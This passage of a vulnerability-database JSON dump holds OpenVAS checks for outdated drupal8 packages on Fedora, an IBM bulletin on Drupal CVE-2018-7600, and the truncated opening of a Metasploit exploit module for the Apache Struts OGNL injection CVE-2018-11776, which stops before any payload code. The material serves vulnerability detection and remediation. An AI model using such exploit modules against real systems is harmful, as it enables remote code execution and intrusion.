value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZGZBSHQC6C3WLIATUZXNKC3DB73ADIXZ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2018-7d748596e9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-1ba93b3144", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874422", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874422", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1ba93b3144_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-1ba93b3144\n#\n# Authors:\n# System Generated Check\n#\n# 
Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874422\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:57 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-1ba93b3144\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", 
value:\"2018-1ba93b3144\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-03T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-79bd99f9a8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-6341", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310875534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875534", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 
2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875534\");\n script_version(\"2019-04-03T06:51:54+0000\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2019-6341\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-79bd99f9a8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-79bd99f9a8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QNTLCBAN6T7WYR5C4TNEYQD65IIR3V4P\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-79bd99f9a8 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the 
target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.13~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-6e6d8c314b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874382", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874382", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_6e6d8c314b_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-6e6d8c314b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874382\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:51:05 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\",\n \"CVE-2017-6931\", \"CVE-2017-6928\", \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-6e6d8c314b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-6e6d8c314b\");\n 
script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSND764JDPO7QHXKOFVZCECOMLR3N6L\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.6~3.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2018-7600", "CVE-2019-10911", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-10910", "CVE-2019-10909", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310876320", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876320", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software 
Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876320\");\n script_version(\"2019-05-17T10:04:07+0000\");\n script_cve_id(\"CVE-2019-10909\", \"CVE-2019-10910\", \"CVE-2019-10911\", \"CVE-2019-11358\", \"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:04:07 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-08 02:09:58 +0000 (Wed, 08 May 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-1a3edd7e8a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-1a3edd7e8a advisory.\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.15~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-922cc2fbaa", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6924", "CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6923", "CVE-2017-6920", "CVE-2017-6929", "CVE-2017-6921", "CVE-2017-6930", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6925"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874383", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874383", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_922cc2fbaa_drupal8_fc26.nasl 14223 
2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-922cc2fbaa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874383\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:51:34 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\",\n \"CVE-2017-6931\", \"CVE-2017-6923\", \"CVE-2017-6924\", \"CVE-2017-6925\",\n \"CVE-2017-6920\", \"CVE-2017-6921\", \"CVE-2017-6922\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-922cc2fbaa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S4QXGSUTNGLGN67JM5KBVWO26ICKTRXL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.3.9~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-21T05:55:08", "description": "## Summary\n\nIBM API Connect has addressed the following vulnerabilities. \n \nAPI Connect Developer Portal is impacted by Drupal vulnerability: \n \nDrupal could allow a remote attacker to execute arbitrary code on the system, caused by an error within multiple subsystems. An attacker could exploit this vulnerability using multiple attack vectors to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n \n**CVEID: **[_CVE-2018-7600_](<https://vulners.com/cve/CVE-2018-7600>)** \nDESCRIPTION: **Drupal could allow a remote attacker to execute arbitrary code on the system, caused by an error within multiple subsystems. An attacker could exploit this vulnerability using multiple attack vectors to execute arbitrary code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/140913_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/140913>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\n**Affected IBM API Connect**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM API Management| 4.0.0.0-4.0.4.6 \nIBM API Connect| 5.0.6.0-5.0.6.6 \nIBM API Connect| 5.0.7.0-5.0.7.2 \nIBM API Connect| 5.0.8.0-5.0.8.2 \n \n## Remediation/Fixes\n\n**Affected Product**\n\n| \n\n**Addressed in VRMF**\n\n| \n\n**APAR**\n\n| \n\n**Remediation / First Fix** \n \n---|---|---|--- \nIBM API Management \n \n4.0.0.0-4.0.4.6| 4.0.4.6. iFix| LI80057| Addressed in IBM API Connect Developer Portal V4.0.4.6 iFix \n \nFollow this link and find the \"APIConnect-Portal\" \niFix dated on or after 2018/03/28. \n \n[https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=4.0.4.6&platform=All&function=all](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.6.2&platform=All&function=all>) \nIBM API Connect \n \n5.0.0.0-5.0.6.6| 5.0.6.6 iFix| LI80057| Addressed in IBM API Connect Developer Portal V5.0.6.6 iFix \n \nFollow this link and find the \"APIConnect-Portal\" \niFix dated on or after 2018/03/28. 
\n \n[https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.6.6&platform=All&function=all](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.6.2&platform=All&function=all>) \nIBM API Connect \n \n5.0.7.0-5.0.7.2| 5.0.7.2 iFix \n| LI80057| Addressed in IBM API Connect Developer Portal V5.0.7.2 iFix \n \nFollow this link and find the \n\"APIConnect-Portal\" \n \niFix dated on or after 2018/03/28. \n \n[https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.7.2&platform=All&function=all](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.7.0&platform=All&function=all>) \nIBM API Connect \n \n5.0.8.0-5.0.8.2| 5.0.8.2 iFix| LI80057| Addressed in IBM API Connect Developer Portal V5.0.8.2 iFix \n \nFollow this link and find the \"APIConnect-Portal\" \niFix dated on or after 2018/03/28. 
\n \n[https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.8.2&platform=All&function=all](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.7.0&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:09:07", "type": "ibm", "title": "Security Bulletin: API Connect Developer Portal is affected by Drupal vulnerability (CVE-2018-7600)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-15T07:09:07", "id": "02D84FEF44D33E0AEFACF9F0F69D208CD35169CED383AB4155C383F596F12961", "href": "https://www.ibm.com/support/pages/node/568925", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-24T16:57:20", "description": "This module exploits a remote code execution vulnerability in Apache Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. 
Remote Code Execution can be performed via an endpoint that makes use of a redirect action. Note that this exploit is dependant on the version of Tomcat running on the target. Versions of Tomcat starting with 7.0.88 currently don't support payloads larger than ~7.5kb. Windows Meterpreter sessions on Tomcat >=7.0.88 are currently not supported. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.\n", "cvss3": {}, "published": "2018-08-31T18:48:22", "type": "metasploit", "title": "Apache Struts 2 Namespace Redirect OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-01-27T15:58:53", "id": "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/struts2_namespace_ognl/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\n #include Msf::Exploit::CmdStager # https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html\n\n # NOTE: Debugging code has been stripped, but is available in the commit history: a9e625789175a4c4fdfc7092eedfaf376e4d648e\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\n 'Description' => %q{\n This module exploits a remote code execution vulnerability in Apache Struts\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\n via an endpoint that makes use of a redirect action.\n\n Note that this exploit is dependant on the version of Tomcat running on\n the target. 
Versions of Tomcat starting with 7.0.88 currently don't\n support payloads larger than ~7.5kb. Windows Meterpreter sessions on\n Tomcat >=7.0.88 are currently not supported.\n\n Native payloads will be converted to executables and dropped in the\n server's temp dir. If this fails, try a cmd/* payload, which won't\n have to write to the disk.\n },\n 'Author' => [\n 'Man Yue Mo', # Discovery\n 'hook-s3c', # PoC\n 'asoto-r7', # Metasploit module\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-11776'],\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Automatic detection', {\n 'Platform' => %w{ unix windows linux },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n },\n ],\n [\n 'Windows', {\n 'Platform' => %w{ windows },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n },\n ],\n [\n 'Linux', {\n 'Platform' => %w{ unix linux },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\n },\n ],\n ],\n 'DisclosureDate' => '2018-08-22', 